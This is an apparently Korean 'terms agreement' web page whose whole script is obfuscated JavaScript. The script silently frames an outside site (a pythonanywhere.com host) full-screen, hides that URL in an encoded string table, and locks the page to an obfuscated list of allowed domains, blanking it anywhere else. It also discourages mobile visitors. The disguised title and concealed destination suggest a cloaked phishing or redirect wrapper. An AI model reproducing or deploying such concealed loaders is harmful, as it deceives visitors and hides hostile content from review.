<!DOCTYPE html>
<html lang="ko">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>약관동의 페이지</title>
    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
        }
        #iframe-container {
            height: 100vh;
            width: 100%;
        }
        #loading {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(255, 255, 255, 0.8);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            backdrop-filter: blur(5px);
            opacity: 1;
            transition: opacity 1s ease;
        }
        .loader {
            border: 8px solid #f3f3f3;
            border-top: 8px solid #3498db;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        #error-message {
            display: none;
            text-align: center;
            margin-top: 20px;
            font-size: 20px;
            color: red;
        }
        #modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            color: white;
            justify-content: center;
            align-items: center;
            z-index: 10000;
        }
        #modal-content {
            background: rgba(0, 0, 0, 0.8);
            padding: 20px;
            border-radius: 10px;
            text-align: center;
        }
        #mobile-message {
            display: none;
            text-align: center;
            margin-top: 20px;
            font-size: 20px;
            color: blue;
        }
        #continue-button {
            margin-top: 10px;
            padding: 10px 20px;
            background: #3498db;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>

<div id="loading">
    <div class="loader"></div>
</div>
<div id="iframe-container">
    <iframe id="my-iframe" width="100%" height="100%" frameborder="0"></iframe>
</div>
<div id="error-message">
    <p>오류가 발생했습니다. 다시 시도해 주세요.</p>
</div>
<div id="modal">
    <div id="modal-content">
        <p>모바일 기기로 접속하셨습니다. <br>본 웹사이트는 데스크탑 전용으로 설계되었습니다. 계속하시겠습니까?</p>
        <button id="continue-button">계속하겠습니다.</button>
        <button onclick="history.back();" id="continue-button">뒤로가기</button>
    </div>
</div>

<script>
const _0x3a49a6=_0x1998;(function(_0x44a352,_0x45d723){const _0x38b66f=_0x1998,_0x266f14=_0x44a352();while(!![]){try{const _0x803cb9=parseInt(_0x38b66f(0x115))/0x1*(-parseInt(_0x38b66f(0x114))/0x2)+-parseInt(_0x38b66f(0xff))/0x3*(-parseInt(_0x38b66f(0x10f))/0x4)+parseInt(_0x38b66f(0x10d))/0x5*(-parseInt(_0x38b66f(0x104))/0x6)+parseInt(_0x38b66f(0x10b))/0x7+parseInt(_0x38b66f(0x102))/0x8+parseInt(_0x38b66f(0x112))/0x9+-parseInt(_0x38b66f(0x10e))/0xa*(-parseInt(_0x38b66f(0x11a))/0xb);if(_0x803cb9===_0x45d723)break;else _0x266f14['push'](_0x266f14['shift']());}catch(_0xe966e9){_0x266f14['push'](_0x266f14['shift']());}}}(_0x38e6,0xbdd4c));function _0x1998(_0x46fcbe,_0x556302){const _0x5bc1ac=_0x38e6();return _0x1998=function(_0x88339c,_0x3c2bfa){_0x88339c=_0x88339c-0xfc;let _0x1268db=_0x5bc1ac[_0x88339c];return _0x1268db;},_0x1998(_0x46fcbe,_0x556302);}const _0x3c2bfa=(function(){let _0x401941=!![];return function(_0x1567a1,_0x53d941){const _0x302e6f=_0x401941?function(){const _0x2ada93=_0x1998;if(_0x53d941){const _0x17ed99=_0x53d941[_0x2ada93(0x100)](_0x1567a1,arguments);return _0x53d941=null,_0x17ed99;}}:function(){};return _0x401941=![],_0x302e6f;};}()),_0x88339c=_0x3c2bfa(this,function(){const _0x1dc461=_0x1998;let _0x536720;try{const _0x2fb1f0=Function(_0x1dc461(0x103)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x536720=_0x2fb1f0();}catch(_0x114133){_0x536720=window;}const _0x186e50=new RegExp(_0x1dc461(0x11f),'g'),_0xf9ef00=_0x1dc461(0x117)[_0x1dc461(0x120)](_0x186e50,'')[_0x1dc461(0x116)](';');let _0x37c82d,_0x24b460,_0x19905e,_0x22ddea;const _0x24c755=function(_0x3dfc6e,_0x105b67,_0x4f9971){const _0x5ea0ec=_0x1dc461;if(_0x3dfc6e[_0x5ea0ec(0x107)]!=_0x105b67)return![];for(let _0x265c7e=0x0;_0x265c7e<_0x105b67;_0x265c7e++){for(let _0x3cc089=0x0;_0x3cc089<_0x4f9971[_0x5ea0ec(0x107)];_0x3cc089+=0x2){if(_0x265c7e==_0x4f9971[_0x3cc089]&&_0x3dfc6e[_0x5ea0ec(0x105)](_0x265c7e)!=_0x4f9971[_0x3cc089+0x1])return![];}}return!![];},_0x32f0ad=function(_0x3de770,_0x3220a2,_0x3f2764){return _0x24c755(_0x3220a2,_0x3f2764,_0x3de770);},_0x4c192d=function(_0x4d4738,_0x548dd2,_0x55ba49){return _0x32f0ad(_0x548dd2,_0x4d4738,_0x55ba49);},_0x1676e4=function(_0x490ddb,_0x5eda17,_0x235f1a){return _0x4c192d(_0x5eda17,_0x235f1a,_0x490ddb);};for(let _0x27e007 in _0x536720){if(_0x24c755(_0x27e007,0x8,[0x7,0x74,0x5,0x65,0x3,0x75,0x0,0x64])){_0x37c82d=_0x27e007;break;}}for(let _0x573668 in _0x536720[_0x37c82d]){if(_0x1676e4(0x6,_0x573668,[0x5,0x6e,0x0,0x64])){_0x24b460=_0x573668;break;}}for(let _0x21bded in _0x536720[_0x37c82d]){if(_0x4c192d(_0x21bded,[0x7,0x6e,0x0,0x6c],0x8)){_0x19905e=_0x21bded;break;}}if(!('~'>_0x24b460))for(let _0x26296e in _0x536720[_0x37c82d][_0x19905e]){if(_0x32f0ad([0x7,0x65,0x0,0x68],_0x26296e,0x8)){_0x22ddea=_0x26296e;break;}}if(!_0x37c82d||!_0x536720[_0x37c82d])return;const _0x328578=_0x536720[_0x37c82d][_0x24b460],_0x19b029=!!_0x536720[_0x37c82d][_0x19905e]&&_0x536720[_0x37c82d][_0x19905e][_0x22ddea],_0x191cfc=_0x328578||_0x19b029;if(!_0x191cfc)return;let _0x11895f=![];for(let _0x5867c3=0x0;_0x5867c3<_0xf9ef00[_0x1dc461(0x107)];_0x5867c3++){const _0x1a0c28=_0xf9ef00[_0x5867c3],_0x27fdfe=_0x1a0c28[0x0]===String[_0x1dc461(0xfd)](0x2e)?_0x1a0c28['slice'](0x1):_0x1a0c28,_0x41d5a4=_0x191cfc[_0x1dc461(0x107)]-_0x27fdfe['length'],_0x35ab6a=_0x191cfc['indexOf'](_0x27fdfe,_0x41d5a4),_0x2b3f46=_0x35ab6a!==-0x1&&_0x35ab6a===_0x41d5a4;_0x2b3f46&&((_0x191cfc['length']==_0x1a0c28[_0x1dc461(0x107)]||_0x1a0c28['indexOf']('.')===0x0)&&(_0x11895f=!![]));}if(!_0x11895f){const _0x15ba18=new RegExp(_0x1dc461(0x11e),'g'),_0x14cb77='dKqGabmIoDuXAHztPe:blajnkKxPTPQUUcgifrZjvZ'[_0x1dc461(0x120)](_0x15ba18,'');_0x536720[_0x37c82d][_0x19905e]=_0x14cb77;}});_0x88339c();const iframeUrl=_0x3a49a6(0x108),iframe=document[_0x3a49a6(0xfe)]('my-iframe'),loadingElement=document[_0x3a49a6(0xfe)](_0x3a49a6(0x106)),errorMessage=document['getElementById'](_0x3a49a6(0x10a)),modal=document['getElementById']('modal'),continueButton=document[_0x3a49a6(0xfe)](_0x3a49a6(0x118)),userAgent=navigator[_0x3a49a6(0x110)][_0x3a49a6(0x113)](),isMobile=/android|iphone|ipad|ipod/[_0x3a49a6(0x11d)](userAgent);function _0x38e6(){const _0x15efe6=['style','test','[dKqGmIDXAHzPejKxPTPQUUcgifrZjvZ]','[SNfFAFQEDjMVGUpDANQWllaKPmVFGHAIIMGNzNpNPPLKLylIIBALwFOpCTSPKCmaYKdvU]','replace','block','fromCharCode','getElementById','2834406oqgxnr','apply','display','11053920zDjHiQ','return\x20(function()\x20','960rOQEXg','charCodeAt','loading','length','https://csgns142.pythonanywhere.com','none','error-message','2484979LXjCXD','onclick','47165WpRwOJ','5155070MzBZsF','4krojYg','userAgent','flex','4907160NprPeA','toLowerCase','1455458Ukvgcz','2GFUwHf','split','SNhfFAeFQoEnDjM0V1GUp20DA.gNithQub.iWlo;lacKsPgmns.VFkGrHo.kArIIMGNzNpNPPLKLylIIBALwFOpCTSPKCmaYKdvU','continue-button','src','11apbISk','onload'];_0x38e6=function(){return _0x15efe6;};return _0x38e6();}if(isMobile)loadingElement['style']['display']=_0x3a49a6(0x109),modal['style']['display']=_0x3a49a6(0x111);else{iframe['src']=iframeUrl;let loadingTimeout=setTimeout(()=>{showError();},0x1388);iframe[_0x3a49a6(0x11b)]=function(){const _0x16e1b4=_0x3a49a6;clearTimeout(loadingTimeout),loadingElement[_0x16e1b4(0x11c)][_0x16e1b4(0x101)]='none';},iframe['onerror']=function(){clearTimeout(loadingTimeout),showError();};}continueButton[_0x3a49a6(0x10c)]=function(){const _0x3d3d99=_0x3a49a6;modal['style']['display']=_0x3d3d99(0x109),loadingElement[_0x3d3d99(0x11c)][_0x3d3d99(0x101)]=_0x3d3d99(0x109),iframe[_0x3d3d99(0x119)]=iframeUrl;};function showError(){const _0x12044b=_0x3a49a6;loadingElement[_0x12044b(0x11c)][_0x12044b(0x101)]=_0x12044b(0x109),errorMessage['style'][_0x12044b(0x101)]=_0x12044b(0xfc);}
</script>

</body>
</html>
